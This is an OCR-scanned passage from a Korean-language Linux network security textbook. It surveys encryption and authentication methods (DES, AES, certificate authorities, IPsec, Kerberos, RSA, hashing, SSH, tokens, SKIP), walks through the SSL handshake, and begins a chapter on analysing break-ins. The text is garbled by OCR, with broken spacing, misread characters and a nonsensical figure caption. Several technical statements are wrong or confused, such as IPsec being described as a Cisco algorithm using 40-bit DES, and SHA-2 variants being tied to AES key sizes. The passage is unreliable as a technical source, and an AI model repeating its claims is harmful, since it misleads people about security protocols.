들이 리용한 장치의 설계에 대한 자료들이 완전히 서술되여있다. 명백히 이것은 얼마만한 
열쇠길이가 안전한것으로 간주되는가에 관한 완전히 새로운 견해를 주었다. 

3) 강력한 암호화의 필요성 

인증이 제대로 되고있다면 왜 암호화가 요구되는가? 암호화는 두가지 목적에 쓰인다. 

첫째로; 자료도청을 막기 위해서이다. 

둘째로; 자료변경을 막기 위해서이다. 

암호화는 자료가 전송도중에 변경되지 않도륵 담보할수 있다. 이리한 문제는 중개자 
공격 에 의 하여 생 기 며 자료전송을 파피 하려 는 공격 자의 능력 에 관계 된 다. 직 결 식 봉사주문 
들을 받아들일수 있도륵 구성된 웨브봉사기를 가지고있다고 가정하자. 사용자들은 직결양 
식들에 써넣으며 그러면 직결양식은 웨브봉사기에 평문형식으로 기억된다. 규칙적인 간격 
으로 이러한 파일들은 FTP 나 SMTP 를 거처서 다른 체계로 전송된다. 

만일 공격자가 웨브봉사기의 파일체계에 접속할수 있다면 공격자는 이 려한 본문파일 
들을 사전에 변경 시 킬수 있 다. 이 때 공격 자는 수량이 나 제 품의 번호들을 변경 시 킬수 있 다. 
들린 주문을 받는 의 뢰 기 는 매 우 불행 하게 된 다. 이 실 례 에 서 는 공격 자가 파일 체 계 에 접 
근하고 있다고 가정하고있지만 망을 통한 중개자공격도 가능하다. 

또한 공격 자가 자료를 변경 시켜 다른 사람의 사업 을 혼란시 킬수도 있 다. 이 정 보를 강 
력 한 암호화알고리 듬을 리용하여 암호화하면 이 려 한 공격 은 훨 씬 힘 들어 진 다. 왜 냐하면 공 
격자가 암호화된 파일속에 어떤 값이 들어있는지 알수 없기때문이다. 공격자의 능력이 좋 
다고 해도 암호를 복호화하는 알고리듬은 자료의 변화를 검출할것 이 다. 

4) 대표적 인 인증과 암호화방법들 

인증과 암호화봉사를 제공하여주는 많은 방법들이 있다. 어떤것은 특정의 제 작자에 의 
하여 제 작된 제 품들이 며 어 떤것 은 열린 표준들이다. 어 느것 이 좋은가 하는것 은 요구에 따 
라 다르다. 아래 에 가장 널 리 쓰이 는 인증 및 암호화방법 들을 소개한다. 
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— 자료암호화표준 ( DES ) 

DES 는 오래동안 리용된 가장 일반적인 비밀열쇠알고리듬이였다. 

DES 의 원래의 표준은 40 bit 혹은 56 bit 의 암호화열쇠를 리용한다. 가장 최근의 표준 
인 3중 DES 는 2개 혹은 3개 의 서 로 다른 56 bit 열쇠 를 리 용하여 평 문을 세 번 암호화한 
다. 이것은 112 bit 혹은 168 bit 열쇠를 가진 암호문을 만들어 내며 뒤방향호환성 을 유지한 
다. DES 는 제 3자가 일부 평문과 그에 따르는 암호문을 안다고 하여 도 모든 열쇠 를 조사 
하지 않고서는 그 열쇠를 얻을수 없게 설계되였다. DES 의 원래의 표준은 3일동안의 폭 
력 공격 에 의하여 깨 여 졌지만 새 로운 3중 DES 표준은 앞으로 몇년동안은 안전한것 으로 남 
아있을것 이 다. 

— 개량암호화표준 ( AES ) 

개량암호화표준 ( AES ) 은 DES 를 계승하여 나왔다. AES 는 DES 의 결함(암호화약점， 
열쇠길이의 제한， 장치에 의존하는 응용)을 극복하기 위하여 설계되였으며 앞으로의 기 
술발전을 위한 틀거 리를 제 공한다. AES 가 20()1 년 여름까지 완전한 표준으로 설정되지는 
않았지만 NIST (국가표준기 술국)는 2000년 10월 2일 에 Rijndael 알고리 듬을 DES 를 교체 
할 핵심으로 공포하였다. Rijndael 은 가변길이 블로크암호이지만 AES 에서 실현될 때에는 
처음에 열쇠길이 128， 192， 256 bit 를 취한다. 

NIST 는 Rijndael 이 펜리움급의 콤퓨터 들뿐아니 라 지 능카드들에 서 도 잘 동작하기 때 문 
에 이것을 선택하였다. 또한 가변길 이 열쇠를 쓸수 있는 능력과 다른 암호화특성들로 하 
여 NIST 는 Rijndael 이 AES 의 최종평 가를 위 하여 제기된 5개의 표준들중 가장 좋다고 결 
정하였다. 


一 수자식증명서봉사기 

공개열쇠암호와 비밀열쇠암호에 대한 절에서도 본바와 같이 비밀열쇠는 독특한 수자 
식서명을 만드는데 리용될수 있다. 이 서명은 후에 그것이 인증되였다는것을 담보하기 위 
하여 공개 열쇠 로 검 증될수 있다. 이 리 한 과정 은 사용자의 신분을 인증하는 매 우 강력 한 방 
법 을 제공한다. 수자식증명서 봉사기는 많은 공개 열쇠들의 관리를 위 한 중심 점 을 제공한다. 
이 것은 매 사용자들이 다른 사람의 공개열쇠 를 복사하여 관리하지 못하게 하여준다. 

수자식증명서 봉사기들은 증명서권한기 관 ( CA ) 이 라고도 하는데 수자식서명 의 확인을 제 
공한다. 실례로 만일 A 가 B 로부터 수자식서명이 있는 통보문을 받았지만 묘의 공개암호 
화열쇠를 가지 고있지 못하다면 A 는 CA 로부터 묘의 공개열쇠를 받아서 그 통보문이 인증 
될수 있다는것을 확인할수 있다. 또한 A 가 묘의 전자우편에 응답하려 하지만 제3자의 도 
청 을 막기 위하여 통보문을 암호화하려 한다고 하자. A 는 CA 로부터 묘의 공개열쇠 를 받 
아서 그 통보문을 묘의 공개열쇠 를 리 용하여 암호화할수 있다. 

증명서봉사기는 하나의 서명과 접근조종을 제공하는데 리용될수도 있다. 증명서는 접 
하기 위 하여 봉사기 에 들어 있는 파일 들에 대 한 접 근조항목록에 첨 부될 수 있 다. 사 
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용자가 파일에 접근하려고 한다면 봉사기는 사용자의 증명서에 접근이 허가되였는가를 확 
인한다. 이것은 CA 가 기 관의 거의 모든 문서의 보안을 관리하게 한다. Netscape 증명서 
봉사기 는 파일준위접 근조종을 지 원하는 CA 의 좋은 실례 이 다. 

CA 를 리 용하는데 서 가장 큰 우점 은 그것 이 수자식 증명 서 에 대 한 공업 표준형 식 인 X . 509 
를 지원하는데 있다. 이것은 기관들사이에서 증명서가 확인되고 정보를 암호화하게 하여 
준다. 만일 두 령역 사이에 정 보를 교환하는 기 본방법 이 전자우편 이 라면 CA 는 가상사설망 
을 리용하는것보다 훨씬 더 효과적일수 있다. 

一 IP 보안 ( IPsec ) 

IP 보안 ( IPsec ) 은 Cisco 체계들에서 많이 리용되고있는 공개 및 비밀열쇠암호화알고리 
듬이 다. 이것은 열린 표준들의 집 합으로서 그리 새 로운 형 식은 아니 다. IPsec 는 인증을 실 
현하고 대 화열쇠 를 설정 하기 위하여 Diffie — Heilman 교환을 리용한다. IPsec 는 또한 자 
료흐름을 암호화하기 위하여 40 bit DES 알고리 듬을 리용한다. IPsec 는 대 화층에 서 실 현 
되 였으며 따라서 직접 적 인 응용프로그람지원을 요구하지 않는다. IPsec 의 리용은 말단사 
용자들에 게 알기 쉽다. 

IPsec 의 우점의 하나는 쓰기 편리한것이다. Cisco 가 IPsec 를 자기의 경로기제품들에 넣 
은것으로 하여 IPsec 는 명백한 가상사설망 ( VPN ) 해결책으로 된다. IPsec 는 인터네트로부 
터의 원격망접속에 널리 쓰이고있으므로 40 bit DES 알고리듬을 리용하는것은 일반적인 망 
리용에서 가장 적 합하다. 매 우 중요한 자료들을 안전하지 못한 통로로 보내 야 하는 필요 
가 있는 기 관들은 여 러 가지 암호화기 술들을 선택하는데 심 중하여 야 한다. 

— Kerberos 

Kerberos 는 또 한가지 인증방법으로서 서로 다른 환경에서 하나의 서명을 제공하기 위 
하여 설계 되 였 다. Kerberos 는 사용자와 봉사들사이 의 호상인증과 암호통신을 실현하여준 
다. 그러 나 보안통표와 달리 매 사용자가 특정 의 통과암호를 기 억 하고 유지 하도록 하여주 
며 사용자가 국부조작체계에 인증할 때 국부대리 인은 Kerberos 봉사기에 인증요구를 보낸 
다. 봉사기는 체계에 인증하려고 하는 그 사용자에 대한 암호화된 신용증명서를 보낸다. 국 
부대 리 인은 그 다음 사용자가 제 공하는 동과암호를 리 용하여 신용증명 서 를 해 득한다. 

만일 정확한 통과암호를 받았다면 사용자는 확인되며 인증표가 제공되여 그는 다른 
Kerberos 인증봉사에 접근할수 있게 된다. 사용자는 또한 모든 자료들을 암호화하는데 리 
용될수 있는 암호열쇠모임을 얻는다. 

일단 사용자가 확인되면 그는 임의의 Kerberos 관련봉사기들이나 응용프로그람들에 
대한 인증을 하지 않아도 된다. Kerberos 봉사기가 내는 표는 추가적인 망원천들에 접 
속하는데 필요한 신용증명서들을 제공한다. 이것은 사용자가 여전히 자기의 통과암호를 
기 억하여 야 하지 만 망의 모든 체 계 들에 접 근하는데 하나의 통과암호만이 필요하다는것 
을 의 미한다. Kerberos 의 가장 큰 우점 의 하나는 자유롭게 쓸수 있는것 이 다. 원천코드 
는 무료로 내 리적재하여 리용할수 있다. 
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一 RSA 암호화 

RSA 암호화알고리듬은 1977년에 리베스트，샤미르，아델만에 의하여 만들어졌다. RSA 
는 공개 및 비밀열쇠 암호에서 사실상 표준으로 간주되 고있으며 이것은 Microsoft , Apple , 
Novell , Sun , Lotus 등의 제품에 쓰이고있다. 공개 및 비밀암호체계로서 인증도 실현할 
수 있다. 

RSA 가 널리 쓰인다는 사실은 호상리용성과 관련하여 매우 중요하다. 통보문을 만들 
때 리용하는 알고리듬과 다른 알고리듬을 쓴다면 그 통보문을 인증하거나 복호화할수 없 
다. RSA 를 지원하는 제품에서는 넓은 사용자범위에서 정보를 교환할수 있도륵 담보한다. 
RSA 는 오래동안 철저 한 검 토를 진행 하였 다. 자료를 보호하기 위 하여 하나의 알고리 듬을 
선택할 때 이것은 중요한 인자로 된다. 

一 하쉬 알고리 듬 ( Hashing ) 

수자식서명 은 비밀열쇠를 리용하여 전체 통보에 서명하는 방법 으로 동작한다. 이 것은 
복잡하며 시간이 많이 든다. 한가지 방법은 하나의 자료요약을 만들고 그 다음 그 통보문 
요약에 비밀열쇠 로 서명 (또는 암호화)하여 (이것을 보통 하쉬 라고 한다) 전체 통보에 서명 
하는것과 같은 효과를 얻는것 이 다. 

이것은 하쉬알고리듬으로 수행되는데 원래 파일을 입구하여 통보문요약을 만들며 거 
기에 비밀열쇠로 서명하여 전송한다. 수신자는 서명자의 공개열쇠를 암호화된 하쉬값에 적 
용하여 수신자의 신분을 검 증한다. 수신자는 그다음 송신자와 같은 하쉬알고리 듬을 리용 
하여 원래 파일 을 처 리 하고 원래 하쉬값과 비 교한다. 만일 갈으면 수신자는 통보가 송신 
도중에 수정되지 않았다는것을 확인한다. 

u SHA -1 (Secure Hash Algorithm -1) 

SHA -1 (안전한 하쉬알고리 듬) 은 NIST 에 의해 제 안되 여 DSS 표준으로 등록되 였 으며 
DES 와 함께 수자식서명 에 리 용된다. 

1994년 에 실 현(원래 의 SHA 에 서 몇 가지 결 함을 수정하여 ) 되 였 으며 SHA -1 은 160 bit 
통보요약값을 준다. 2000년 10월 12일 NIST 는 새 로운 AES 와 함께 쓰일 SHA 에 기초한 
3개 의 알고리 듬을 공개하였 다. 

SHA -256, SHA -384, SHA -512 는 3개의 서로 다른 AES 열쇠크기 (128, 192, 256 bit ) 
로 동작한다. 

u MD 5 

1991년 MIT 의 로버 트 리베 스트에 의해 제 안되 였 으며 MD 계 렬 하쉬알고리 듬의 최 신 
판이다. 32 bit 처리소자에서 동작할수 있게 설계되였으며 MD 5 는 128 bit 의 요약값을 준다. 
MD 5 는 SHA -1 보다 빠르지만 더 안전하지는 못하다. 


# 


안전 한 쉴 ( SSH ) 

한 쉘 ( SSH ) 은 의 뢰 기 인증을 보장하고 두 체 계 사이 에 다중봉사대 화를 보호하는 강 
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력 한 방법 이 다. 핀 란드의 대 학생 Tatu Ylnen 에 의 해 제 안된 SSH 는 LINUX 체 계 에서 널 
리 쓰이고있다. 이 규약은 Windows 와 OS/2 에도 내장되였다. 

SSH 로 동작하는 체계들은 련결요구를 포구 22 로 듣는다. 만일 SSH 체계로 동작하는 
2 개의 체계가 련결된다면 매개는 RSA 를 리용한 수자식증명서교환을 수행 하여 상대방의 신 
용증명서를 검사한다. 매 사람의 신용증명서가 검증되면 두 체계를 통하여 교환되는 모든 
정 보를 암호화하기 위 하여 3 중 DES 를 리 용한다. 두 호스트들은 통신대 화과정 에 대 방을 인 
증하며 암호화열쇠를 주기적으로 바꾼다. 

이 것은 폭력 공격 이 나 재생공격 이 효과가 없게 한다. 

SSH 는 불안전한 규약을 안전하게 하는 좋은 방법 이 다. 

실례 로 telnet 와 FTP 대 화들은 모두 인증정 보들을 평 문으로 교환한다. SSH 는 이 대 
화들을 교갑화하여 평문정보가 보이 지 않게 한다. 

— 보안통표 (Security Tokens) 

보안통표는 통표 카드 (또는 지능 카드)라고도 부르는데 국부의뢰기나 망봉사접근에 리 
용될수 있는 통과단어생성장치들이 다. 물리적으로 통표는 통과단어와 통과단어의 남아있 
는 시 간을 표시하는 LCD 현시장치 를 가지 고있는 작은 장치 이 다. 현재 의 통과암호의 존재 
기간이 끝나면 새로운 통과암호가 발생된다. 이것은 높은 수준의 인증보안을 제공한다. 왜 
냐하면 약속된 통과암호가 매우 제한된 생명주기를 가지기때문이다. 그림 3-39 에서 여 러 
가지 보안통표들을 보여주었 다. 이 통표들을 SecurlD 카드라고 한다. 



그림 3 _ 39. Security Dynamics Technologies 에서 생산된 SecurlD 카드들 


보안통표들은 현존 조작체계나 응용프로그람과 직접 인증하지 않는다. 가입등록요구 
를 인증봉사기 에 넘기 기 위한 대 리 자가 요구된다. 례를 들어 Check Point 방화벽 一 1 은 
SecurlD 를 동하여 들어오는 의뢰기인증을 지원한다. 

인터네트밖의 사용자가 Check Point 방화벽 一 1 로 보호된 인터네트안의 봉사에 접근하 
려 면 자기 의 SecurlD 통표를 리 용하여 방화벽 에 인증한다. Check Point 방화벽 一 1 은 이 인 
증을 직 접 하지 않고 방화벽 우의 대 리 자가 ACE/Server 라고 하는 SecurlD 인증봉사기 에 가 
입등록요구를 내 보낸 다. 

만일 신용증명서가 정확하면 암호화된 대화를 통하여 대 리자에게 옳다는 신、 
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사용자는 내부망에 접근할수 있게 된다. 매 보안통표는 ID 번호에 의하여 식별된다. ID 번 
호는 매 보안통표를 유일하게 식별한다. ID 번호는 또한 매 통과단어를 생성하는데 리용되 
는 알고리 듬을 수정하는데 쓰이며 따라서 여 러 개의 통표가 같은 통과단어 렬을 만들수 없다. 

통과암호가 규칙 적 인 시 간간격 (보통 60초)으로 완료되 기때 문에 보안통표는 처 음에 인 
증봉사기와 동기를 맞추어 야 한다. 

이리한 형태의 인증은 많은 쓸모가 있다. 첫째로 사용자는 자기의 통과암호들을 기억 
할 필요가 없다. 그들은 보안통표로부터 현재의 통과암호를 읽고 이 값을 인증에 리용하 
면 된다. 사용자는 자기의 통과암호를 규칙적인 시간간격으로 변경시키지 않아도 된다. 왜 
냐하면 이것은 보안통표에 의하여 자동적 으로 실현되 기때문이 다. 또한 통표가 매 인증에 
서 리 용되 는 물리 적 인 장치 이 므로 사용자는 보통 자기 의 통과암호를 다른 사람에 게 줄수 없 
다. 사용자가 자기의 통과암호를 다른 사용자에게 읽 어준다고 해도 통과암호가 매 우 짧은 
기 간에 만 맞기 때 문에 그 통과암호를 리용할수 없 다. 

보안통표는 인증을 제공하는 우수한 방법이다. 유일한 약점은 임의의 형태의 대화암 
호화를 제공하지 못한다는것 이 다. 그것은 이 기능을 제공하는 조작체계 나 응용프로그람에 
의존한다. 실례로 이것은 공격자가 telnet 대화로 가장하고 들어온다면 인증정보를 평문으 
로 읽을수 있다는것을 의미 한다. 그러므로 주어 진 통과암호의 제한된 생명주기는 이 러한 정 
보를 리용하기 어 렵게 한다. 

— 인 터 네 트규약을 위한 단순열쇠 관리 ( SKIP ) 

SKIP 는 대화층에서 동작한다는 점에서 SSL 과 비슷하다. SSL 과 마찬가지로 SKIP 는 
IP 봉사가 암호화를 지원하는가에 관계없이 그 봉사를 지원하는 능력을 가전다. 이것은 두 
호스트사이 에서 동작하는 여 러개의 IP 봉사들을 가지 고있는 경우에 매우 쓸모있다. 

SKIP 와 SSL 과 다른점 은 대 화층사이 에서 설정 및 열쇠의 교환을 위한 사전통신이 필 
요없는것이다. Diffie - Hellman 의 공개 및 비밀알고리듬은 공유된 비밀열쇠를 생성하는데 
쓰인다. 이 공유된 비밀열쇠는 IP 파케트에 기초한 암호화와 인증을 제공하는데 쓰인다. 
SKIP 는 자료의 암호화에 매우 효과적일 뿐아니라 VPN 의 성능을 개선하는데 이것은 매 대 
화의 완전성 을 유지 하기 위한 공유된 비밀 열쇠 를 장기 적 으로 보호하는데 기 초하고있다. 

SKIP 는 SSH 에서와 같이 새로운 열쇠값들을 련속적으로 생성하지 않는다. 그러므로 
열쇠가 적당히 보호되지 않으면 SKIP 암호화는 취약하다. 

3.5.4. LINUX 에 서 웨 브보안을 위한 SSL 실현 

Netscape 에서 만든 안전 한 소케트층 (Secure Sockets Layer : SSL ) 은 0 SI 모형의 대 
화층에 RSA 암호화를 제공한다. 대화층에서 암호화를 진행하여 SSL 은 봉사에 독립인 능 
력을 가지게 된다. SSL 은 FTP , HTTP , telnet 와 같이 동작하지만 주로 안전한 웨브상 
업에서 z 많이 리용된다. RSA 암호화가 공개 및 비밀열쇠암호화이기때문에 수자식증명서도 


錢變邊 鍾變變©繼繼 





게 3 광. LINUX 에째 땅보冬到 나련요소 


지원된다. 이것은 SSL 이 봉사기를 인증하고 선택적으로 의뢰기도 인증할수 있게 해준다. 

Netscape 는 자기 의 웨 브열 람기 와 웨 브봉사기 제 품에 SSL 을 포함하고있 다. Netscape 는 지 
어 원천코드를 제공하여 SSL 이 다른 웨브봉사기 가동환경들에 접속할수 있게 해준다. 

웨브페지를 만드는 웨브전문가는 모든 웨브열 람기들로부터의 SSL 련결요구에 따라 페 
지를 표시할수 있다. 이것은 직결식상업을 비교적 안전한 방법으로 할수 있게 한다. 

1) 알고리듬 

— 의뢰기는 봉사기 에 접속하여 지 원되는 암호화알고리듬목록을 전송한다. 

一 봉사기 는 알고리 듬이 름，공개열 쇠 및 하쉬알고리 듬 이 름으로 응답한다. 

一 의뢰기는 공개열쇠가 봉사기의것과 같은지 확인한다. 

一 의뢰기는 대화열쇠를 생성하여 봉사기의 공개열쇠로 암호화하여 봉사기에게 전송 
한다. 

一 봉사기 는 이 대 화열쇠를 자신의 비밀열쇠 로 해 독하고 이 것을 사용하여 그 대화련 
결기간 전송되는 자료를 암호화한다. 

一 의뢰기는 임의의 문자렬을 대 화열쇠 로 암호화하여 봉사기 에 전송한다. 

— 봉사기는 수신을 확인한다. 

우의 인증수법은 봉사기 가 의뢰기를 인증하는데 사용하는데 봉사기 가 의뢰기의 공개 
열쇠를 가지고있어야 한다. 

2) 구성 

SSL 규약은 련결지향형 망층규약(실례로 TCP / IP ) 과 응용층규약(례를 들어 HTTP , 
IMAP ) 사이 에 위 치 한다. SSL 규약은 TCP / IP 규약을 리 용하며 SSL 이 내 장된 봉사기 가 SSL 
이 내 장된 의뢰기 에게 인증받을수 있도륵 한다. 또한 의뢰기 자신이 봉사기 에게 인증받을 
수 있도륵，의 뢰기-봉사기 사이에 암호화통신이 가능하도록 해준다. 

SSL 레 코드규약 (SSL record protocol ) 과 SSL 련결확립 규약 (SSL handshake protocol ) 이 
라는 두개의 아래준위규약을 포함한다. 

여 SSL 레코드규약: 자료 전송 형식을 정의 

^ SSL 련결확립규약: 의뢰기와 봉사기사이에 초기 SSL 련결이 이루어졌을 때 SSL 레 
코드규약을 사용하여 일 련의 통보를 교환하는데 관여 한다. (공개 열쇠 암호화와 대 칭 열쇠 암 
호화의 조합방식) 


3) 다양한 암호화기능의 리용 
一 열 쇠교환규약 : RSA , D-H 

一 자료암호화를 위 해서는 대 칭암호가 쓰인다 : DES , 3 DES , RC 4 
一 수자 서 명 : RSA , DSS 

一 MAC 를 리용한 통보완전성 검사 : DES , RC 2 
一 열쇠 생성을 위해 사용되는 함수 : SHA -1, MD 5 
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4) SSL 련결확립통보교환 절차 

一 의뢰기는 봉사기 에게 SSL 의 판본번호，암호문설정상태，임의의 자료그리 고 봉사 
기 가 SSL 을 사용하여 의뢰기와 통신하는데 필요한 기 타 정 보들을 전송한다. 

— 봉사기 역시 의뢰기와 같은 정보들을 의뢰기에 전송하며 추가로 봉사기는 자신의 보 
증정보를 보내준다. 

一 의뢰기는 봉사기 가 보낸 정보를 리용하여 봉사기 인증작업 을 실시한다. 

만약 인증받을수 없는 봉사기라고 판명되면 사용자에게 봉사기와 안전한 련결을 할수 
없음을 경 고한다. 보증된 봉사기 라고 확인되 면 다음 단계 로 넘어 간다. 

一 의뢰기는 련결확립과정에 생성된 그때까지의 모든 자료를 사용하여 보조적인 보호 
자료를 작성한 다음 봉사기 의 공개열 쇠 로서 암호화하여 그것 을 봉사기 로 전송한다. 

一 만약 봉사기가 의뢰기의 인증을 요구하였다면 의뢰기의 자료의 일부에 서명을 하 
여 봉사기에 전송한다. 

一 의뢰기 가 인증받지 못할 경우 대 화는 끝난다. 그러 나 의뢰기 가 성공적 으로 인증되 
였다면 봉사기는 개 인열쇠를 리 용하여 보조적 인 보호자료를 해독하고 의뢰 기와 봉사기는 기 
본 보호자료를 생 성하기 위한 절 차를 실 행한다. 

— 의뢰기와 봉사기는 기 본 보호자료를 리용하여 대 화 열쇠를 만든다. 대화열쇠는 대 
칭열쇠 의 일종이 며 SSL 대 화동안에 교환되 는 정 보를 암호화하고 해 독하는데 사용된다. 또 
한 대화의 완전성을 검증하는데도 사용되는데 이것은 SSL 련결을 통하여 전송되는 자료의 
변화를 판단하는것이다. 

一 의뢰기는 봉사기에게 이후에 전송되는 통보가 대화열쇠로서 암호화될 것이라는 정 
보를 보낸다. 그 다음 의뢰 기 측의 련결확립 작업 이 끝났다는것 을 알리는 암호화된 통보를 봉 
사기에게 전송한다. 

一 봉사기 역시 의뢰기에게 이후에 전송되는 통보가 대화열쇠로서 암호화될것 이라는 정 
보를 보낸다. 그 다음 봉사기 측의 련결 확립 작업 이 끝났다는것 을 알리 는 암호화된 통보를 봉 
사기에게 전송한다 . 

이와 같이하여 SSL 련결확립 이 완료되 고 SSL 대화가 시 작된다. 의뢰기와 봉사기는 대 
화열쇠를 사용하여 서로가 주고받는 통보를 암호화하고 해독하며 완전성을 검증한다. 대 
화를 시 작하기전에 봉사기는 LDAP 등록부내의 사용자 허 가권내 에 의뢰기의 보증서 가 있 
는지 확인하도록 설정될수 있다. 의뢰기와 봉사기의 인증작업에서 중요한 점은 공개열쇠 
와 개인열쇠의 쌍에서 하나의 열쇠만을 사용하여 암호화하고 다른 하나의 열쇠만을 사용 
하여 해 독한다는것 이 다 . 

5) 봉사기인증 

SSL 이 내 장된 Netscape 의 의뢰기쏘프트웨어는 항상 봉사기의 인증 또는 봉사기의 신 
원을 >증하는것을 필요로 한다. 

열쇠를 포함하는 보증서 에 의해 확인되 는 봉사기 와 공개열쇠 와의 바인덩 을 인증 
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하기 위해서는 다음의 네가지 사항에 대해 〈〈 yes 》 라는 응답을 받아야 한다. 

— 현재 날자가 유효기간에 속하는가? 

의뢰기는 봉사기 보증서의 유효기 간을 확인한다. 

一 공개된 CA 는 믿을수 있는가? 

의뢰 기는 CA 보증서의 목록을 보관하고있다. 공개된 CA 의 식 별이름 ( DN : 
Distinguished Name ) 이 의뢰 기 가 보관하고있는 목록가운데서 CA 의 식 별 이 름과 일치 해 
야 한다. 

一 사용하려 는 CA 의 공개열쇠 가 개 발자의 수자서 명 의 유효성 을 확증할수 있는가? 

의뢰기는 CA 보증서의 공개열쇠를 리용하여 봉사기의 보증서에 있는 수자서명의 유효 
성을 검사한다. 

一 봉사기의 보증서에 기록되여있는 령역이름이 봉사기의 실제 령역이름과 일치하는가? 

봉사기 가 실제 로 보증서 에 있는 령역과 같은 망주소에 위 치하는가를 확인하는 단계 이 
다. 이것은 SSL 규약의 기술적인 부분과 사실상 관계가 없으나 SSL 규약은 
Man - in - the-Middle 과 같은 보안공격으로부터의 보호를 지원한다. 

Man - in - the-Middle 이 란 의뢰 기 가 SSL 규약을 사용하여 봉사기 에 련결하려 하는 경 
우에 의뢰 기-봉사기사이의 모든 통신을 방해 하는 일종의 프로그람이 다. 이 프로그람은 SSL 
련결이 진행되는 동안에 오고가는 합법적인 열쇠를 가로채고 자신의 열쇠를 대신 전송하 
여 그 열쇠가 봉사기에게는 의뢰기의 열쇠，의뢰기에게는 봉사기의 열쇠인것처럼 속인다. 

봉사기 인증작업 이 성 공적 으로 이루어지면 의뢰기 는 SSL 련결확립 을 계속 진행한다. 

6) 의뢰기인증 

의뢰기는 자신의 인증을 위하여 봉사기 에게 보증서 및 수자 서명된 자료를 전송한다. 
봉사기 는 보증서 의 공개열쇠 를 검 증하기 위하여 그리 고 보증서 가 나타내 는 신원을 인증하 
기 위하여 수자서 명 된 자료를 리 용한다. 

보증서에 의해 확인된 개인이나 실체와 공개열쇠와의 맺기를 인증하기 위해서는 다음 
의 네가지 질문에 대하여 《 yes 》 라는 응답을 받아야 한다. 

一 사용자의 공개열쇠가 사용자의 수자서명의 유효성을 확증하는가? 

봉사기는 사용자의 수자식서명이 보증서의 공개 열쇠로서 확증될수 있는가를 확인한다. 

一 현재 날자가 유효기 간에 속하는가? 

봉사기는 보증서의 유효기간을 확인한다. 

一 공개된 CA 는 믿음성 이 있는가? 

봉사기 는 믿을수 있는 CA 보증서의 목록을 보관하고있다. 봉사기 가 의뢰기 에 접 근할 
수 있는가는 이 목록에 의하여 결정된다. 

一 사용하려 는 CA 의 공개열쇠 가 개 발자(의 뢰기 )의 수자서 명 의 유효성 을 혹증할수 있 
는가? 

봉사기는 CA 보증서의 공개열쇠를 리용하여 의뢰기의 보증서에 있는 수자서명의 유효 
성을 검사한다. SSL 규약은 아니지만 Netscape 봉사기는 LDAP 등록부에 접근하 
자의 권한을 위하여 인증과정 의 일부로서 작업 을 수행할수 있 다. 
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一 사용자의 보증서 가 LDAP 권한목록에 포함되 여있는가? 

Netscape 인증봉사기 (Certificate Server) 는 LDAP 등록부안의 권한목록으로부터 무효 
화된 사용자보증서 를 자동으로 삭제할수 있 다. 

一 인증된 의뢰기 에게 요구하는 자원에 접 근할수 있는 권한을 부여할수 있는가? 

봉사기는 봉사기의 접근조종목록 (ACL: Access Control List) 에 준하여 의뢰기 가 어 
떤 자원에 접근할 권한이 있는가를 확인하고 그에 맞는 련결을 한다. 

7) 실제 SSL 의 동작과정 

一 웨브열람기: SSL 로 암호화된 페지를 요청하게 된다 .( https:// 가 사용 된다) 

— 웨 브봉사기 : 공개열쇠 를 인증서 와 함께 전송한다. 

一 웨 브열 람기 : 인증서 가 자신이 신용있다고 판단한 CA (일반적 으로 trusted root CA 
라고 부른다.)로부터 서명된것인지 확인한다. (Internet Explorer 나 Netscape 와 같은 웨 
브열 람기 에는 이미 Verisign 과 같은 널 리 알려진 root CA 의 인증서 가 설치되 여있다. ) 또 
한 날자가 유효한가 그리 고 인증서 가 접 속하려 는 싸이트와 관련되 여있는가를 확인한다. 

一 웨브열람기 : 공개열쇠 를 사용하여 란수적인 대칭암호화열쇠 (Random symmetric 
encryption key) 를 비롯한 URL, http 자료들을 암호화하여 전송한다. 

一 웨 브봉사기 : 공개 열쇠 를 리 용하여 란수적 인 대 칭 암호화열쇠 와 URL, http 자료를 복 
호화한다. 

一 웨 브봉사기 : 요청받은 URL 에 대 한 응답을 웨 브열 람기 로부터 받은 란수적 인 대 칭 
암호화열쇠 를 리 용하여 암호화하여 열 람기 에 로 전송한다. 

— 웨 브열 람기 : 대 칭열쇠 를 리용하여 http 자료와 html 문서 를 제 공받는다. 

이 상에 서 인증이 왜 중요하며 인증을 리용하지 않을 때 어 떤 종류의 공격 이 있을수 있 
는가에 대하여 보았다. 

또한 암호화에 대 하여 서 와 공개 및 비 밀알고리 듬의 차이 에 대 하여 보았다. 또한 최 근 
에 널리 쓰이고있는 대표적 인 인증 및 암호화방법들에 대하여 보았다. 
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제 4장. LINUX 망보안을 위한 체계설정 및 피해대책 

이 장에서는 LINUX 체계에서 해킹을 방지하기 위하여 체계관리자가 하여야 할 임무 
와 해 킹을 당하였을 때 그 피해를 어떻게 수습하며 침 입자를 추적하겠는가 하는 문제 에 대 
해서 서술한다. 

또한 지금까지 고찰한 LINUX 망보안의 구성요소들을 종합하여 통합보안체계를 구성 
하기 위한 방식 을 서 술한다. 


제1절. 해킹피해분석준비 

해킹을 당하였을 때 체계관리자는 침입자가 어떻게 체계를 공격하였으며 체계에 접속하 
여 어떠 한 일을 했는가에 대 하여 분석하여 정확한 사고복구를 하고 재 침 입을 막아야 한다. 

해 킹 피 해 체 계 를 분석 할 때 여 러 가지 환경 에 부닥칠 수 있 다. 봉사를 계 속하여 야 하는 경 
우가 있을수 있으며 피해체계가 먼곳에 있는 경우 보다 빠른 분석을 하여야 하는 경우가 제 
기 될 수 있 다. 이 때 매 경 우에 따라 체 계 를 분석 하는 절 차，깊 이，결 과가 달라질 수 있 다. 피 
해체계분석 방법 에 따르는 우점과 결함을 보면 다음과 같다. 

격리분석 

대 체 로 예 비 체 계 가 있 기 때 문에 정 상적 인 봉사에 지 장이 없는 경 우，또는 분석 하는 동 
안 봉사를 하지 않아도 되는 경우에 가능하다. 

또한 정 확한 증거 가 필 요한 경 우，그리 고 분석 체 계 를 리 용한 아주 절 저 한 분석 을 원 
하는 경우에 이러한 분석을 진행할수 있다. 

격 리 이 후에 는 공격프로그람 또는 침 입 자를 감시 하기 어 렵게 된다. 

직 결 식 ( on - line ) 분석 

대체로 예비체계가 없기때문에 해당 체계가 없으면 정상적인 봉사를 하지 못하는 경 
우에 이 분석 방법을 적용할수 있다. 

피 해체 계 에 실시 간으로 가입등록하여 분석하게 되며 주로 원격지의 체 계를 빨리 분석 
하여 야 할 경우에 적합하다. 

이 경 우 공격프로그람이 나 공격 자의 활동 등을 지 속적 으로 감시할수 있 다. 

분석 도중에 침 입흔적 이 파괴 되거 나 손상될수 있기때 문에 정 확한 분석 이 힘 들다. 

분석체계를 리용한 분석 

